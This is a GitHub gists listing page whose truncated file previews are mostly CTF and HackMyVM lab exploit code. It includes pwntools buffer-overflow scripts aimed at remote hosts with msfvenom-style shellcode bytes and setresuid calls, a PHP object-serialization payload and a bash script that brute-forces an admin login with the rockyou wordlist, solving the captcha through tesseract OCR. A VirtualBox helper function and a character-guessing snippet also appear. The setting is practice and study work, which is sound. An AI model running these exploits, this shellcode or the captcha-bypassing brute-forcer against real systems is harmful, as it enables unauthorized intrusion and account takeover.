sharpicx
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| context(arch='amd64', os='linux') | |
| e = ELF('./leak', checksec=True) | |
| r = remote("10.13.37.10", 9998) | |
| p = process(e.path) | |
| offset = 72 | |
| #call_rsp = p64(0x0000000000400973) | |
| log.info(f'{offset = }') |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import itertools | |
| chars = 'æøå' | |
| texts = [ | |
| "●,dgr●d med fl●de", | |
| "●ldgr●d med fl●de", | |
| "●`dgr●d med fl●de", | |
| "●-dgr●d med fl●de", | |
| "●'dgr●d med fl●de", | |
| "●]dgr●d med fl●de", |
sharpicx
/ exploit2.py
Last active
August 12, 2023 21:06
hackmyvm - registry (pt 2 from cxdxnt to gato) using winedbg
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| import struct | |
| offset = 146 | |
| c = remote("192.168.100.21", 42424) | |
| buf = asm(shellcraft.i386.setresuid(1000, 1000), arch="i386") | |
| buf += b"\xfc\xbb\xea\x91\x13\x42\xeb\x0c\x5e\x56\x31\x1e" | |
| buf += b"\xad\x01\xc3\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff" |
sharpicx
/ exploit.py
Last active
August 12, 2023 21:03
hackmyvm - registry (pt 1 from www-data to cxdxnt)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| context(arch='amd64', os='linux') | |
| elf = ELF("/opt/others/program") | |
| # shellcode is not built with shellcraft.sh but with msfvenom. | |
| buf = asm(shellcraft.amd64.setresuid(1002, 1002), arch="amd64") | |
| buf += b"\x48\x31\xc9\x48\x81\xe9\xfd\xff\xff\xff\x48\x8d" | |
| buf += b"\x05\xef\xff\xff\xff\x48\xbb\x58\x29\xc9\x0e\x3a" | |
| buf += b"\x57\x4c\xaa\x48\x31\x58\x27\x48\x2d\xf8\xff\xff" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| context(arch="amd64", os='linux') | |
| elf = ELF('./ezpz', checksec=True) | |
| p = process(elf.path) | |
| r = remote("3.110.66.92", 30235) | |
| padding = b'A' * 40 | |
| rip = p64(0x0000000000401172) # win function | |
| pa = padding + rip |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| import struct | |
| jmp_esp = struct.pack("<I", 0x0804923c) | |
| context(arch="i386", os="linux") | |
| elf = ELF("./chall", checksec=True) | |
| p = elf.process() | |
| r = remote("stembactf.space", 5200) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| context(arch="i386", os="linux") | |
| elf = ELF("./chall", checksec=True) | |
| r = remote('stembactf.space', 5202) | |
| p = elf.process() | |
| pa = cyclic(80) | |
| p.sendlineafter(":", pa) | |
| p.wait() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| class STEMBACTF | |
| { | |
| public $stemba; | |
| public $ctf; | |
| } | |
| $object = new STEMBACTF(); | |
| $object->stemba = "shar"; | |
| $object->ctf = &$object->stemba; | |
| $serialized = serialize($object); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| vm() { | |
| echo "usage: vm [import|delete|start|modify|stop|restart|list|running] <machineName>" | |
| case "$1" in | |
| "import") | |
| vboxmanage import "$2" | |
| ;; | |
| "delete") | |
| vboxmanage unregistervm "$2" --delete | |
| ;; | |
| "start") |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /bin/bash | |
| function main() { | |
| wordlist=/opt/seclists/Passwords/Leaked-Databases/rockyou.txt | |
| username="admin" | |
| for password in $(cat $wordlist); do | |
| curl -s -o output.png -b cookies.txt -c cookies.txt "http://192.168.100.26/auth.php?generate_captcha=1" | |
| capca=$(tesseract ./output.png - --psm 6 | tr -d '\n[[:space:]]') | |
| res=$(curl -so /dev/null 'http://192.168.100.26/auth.php' -c cookies.txt -b cookies.txt -d "username=${username}&password=${password}&captcha=${capca}" -L -w %{size_download}) | |
| echo "testing: ${password}" |